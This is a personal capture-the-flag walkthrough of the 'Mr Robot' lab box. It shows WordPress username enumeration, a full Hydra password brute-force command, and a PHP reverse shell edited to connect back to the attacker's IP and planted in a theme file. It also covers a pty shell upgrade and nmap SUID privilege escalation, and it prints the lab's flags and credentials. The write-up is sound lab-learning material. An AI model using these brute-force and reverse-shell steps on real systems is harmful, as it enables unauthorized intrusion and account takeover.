CategoriesCTF Write-UpsCybersecurity

walkthrough: { type: “ctf”​, name: “Mr Robot”​ }

This is a copy of the short write-up of the capture the flag (CTF) challenge “Mr Robot” that i had posted to LinkedIn originally, and the steps I took in gaining all three flags. This is still one of the more popular CTF challenges – and was quite fun to get into.

We’ll start the challenge with a bit of enumeration, first step being doing an nmap scan on the host.

ctf-mrrobot-1

First thing we observe there are two services hosted, on ports 80 and 443 respectively – based on the port numbers these should be HTTP and HTTPs services. Let’s try open up the services in the browser to see if it’s displaying the same content.

Repeating this on the HTTPS port, shows the same page – served using a self signed certificate

The website appears to be some form of web-terminal, and displays some commands that you can execute. Lets test them sequentially, starting with prepare

It appears this just loads a short video about FSociety. Same thing occurs on the other menu options. Moving on, lets do a bit of web discovery. I always like to start with checking robots.txt, sometimes there are some hidden gems in it.

Hmmm, lets try grab the files referenced in the last two lines of the robots file

curl http://10.10.77.225/fsocity.dic -O fsocity.dic

Taking a quick look at the contents, appears to be a password dump. Lets save this for use later

Looking at the second file, we have our first flag!

Now, time to figure out what else is on this webserver. To do this, we use a tool called gobuster.

After letting gobuster run for a short while, we observe there are a couple of directories prefixed with wp- this is indicative that the site is running a well known CMS called WordPress. Time to shift focus, and see if we can get to the WordPress backend on /wp-admin

Ok, so access to the admin page is not restricted. Lets try authenticate with a random username. In the first attempt, I tried a combination of user and password.

Notice the error warns us of an invalid username. We might be able to leverage this to bruteforce wordpress and identify a valid username. We’re going to use a tool called Burp Suite for this. I won’t go into detail on how to set up the connection between the browser and Burp. After configuring Burp to intercept the browsers traffic, I tried sending user/user as the credentials to the WP login page. Grabbing the request in HTTP History, we then send it to Intruder (CTRL+I)

We’ll load the fsocity.dic list into the payload options and set the payload position to override the requests username. Hoping we can identify a username that’s valid.

Now, after starting the attack – we notice one payload returns a different length. So the response must be slightly different to the others… Lets take a closer look

Most of the responses have a length of 4061, and in the body “Invalid username”. However, one has a slightly different length – 4112. This one shows a different error in the response, specifically that the password is wrong. This tells us that there is a login called “Elliot” on this wordpress instance.

Right, having identified a possible username we change our Intruder configuration slightly. Lets use the file fsocity.dic as the data source, but change the payload to apply to the password. We’ll statically set the login to Elliot.

After waiting a while, i got bored of watching the Burp Intruder results process so slowly – so switched tactics, and changed my attack to use Hydra. The only difference here, was i deduped the fsocity.dic file – as i noticed it contained a ton of duplicates.

cat fsocity.dic | sort | uniq | sort > fsocity.dic.nodup

hydra -V -l Elliot -P fsocity.dic.nodup 10.10.77.225 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In'

This was a LOT quicker than Burp to get a result. Probably because i didn’t notice the duplicates in fsocity.dic when i ran it through Burp. #facepalm. We now know that Elliot’s password is “ER28-0652”. Let’s test these credentials on /wp-login.php

We’re in! Time to poke around… Lets try get a shell onto the box. The easiest way to do this will be to edit one of the themes PHP files, inserting a php shell/reverse shell. We’ll edit the shell so it knows to connect back to our Attackbox IP (10.10.9.250).

root@ip-10-10-9-250~# cp /usr/share/webshells/php/php-reverse-shell.php ./
root@ip-10-10-9-250~# sed -i 's/PUT_THM_ATTACKBOX_IP_HERE/10.10.9.250/g' php-reverse-shell.php

Now, copy & paste the contents of the php script into one of the .php templates in the theme editor. Something to note, this should NEVER be done on a customers live system. It’ll cause all sorts of havoc. Start a netcat listener (nc -lvnp PORT), and try open the 404.php page on the site. If this works, we will get a reverse shell.

Awesome, we’ve got a shell! We’ll take a look at the local users directory first, might be something of interest there.. First thing to do, upgrade the shell so it’s easier to interact with. (thank you pty.spawn!)

$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$
daemon@linux:/home/robot$ cd /home
cd /home
daemon@linux:/home$ ls -l
ls -l
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot

daemon@linux:/home/robot$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5

daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Ok, so we found two files – one we can’t open and another that appears to contain a user/password hash combo. Checking if the hash exists on crackstation.net was successful! Saves us the effort involved in trying to break the password locally. Lets see if we can su to the user ‘robot’.

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ whoami
whoami
robot
robot@linux:~$ cd ~
cd ~
robot@linux:~$ ls
ls
key-2-of-3.txt	password.raw-md5
robot@linux:~$ cat key*
cat key*
822c73956184f694993bede3eb39f959

Excellent, so we’ve now got the second flag! We’re still not root though, and still do not have the 3rd flag. Lets look for any tools that might have the SUID bit set.

So, we can see several binaries that have suid set. However, one pops out pretty quickly – nmap, as it has an interactive mode that might allow us shell access. Lets give it a try.

Right, this appears straightforward – lets try nmap –interactive and see if we can get into /root

We have successfully gotten root! And the third flag! Woop!

This box is kind of Iconic, with it’s reference to the Mr Robot TV Series. Been meaning to try it for a while, but had my focus elsewhere. Definitely enjoyable to play with, although not as difficult as it could have been. I’m pretty sure there are other methods to getting a foothold on this CTF, perhaps through one of the wordpress themes or plugins. Might try it again in a few weeks and see if there is another entry point.

I realize this isn’t as short as i mentioned in the first paragraph. I did rabbithole a bit poking around the box. Hopefully this article makes sense & is enjoyable to those who do decide to read it 🙂

Keith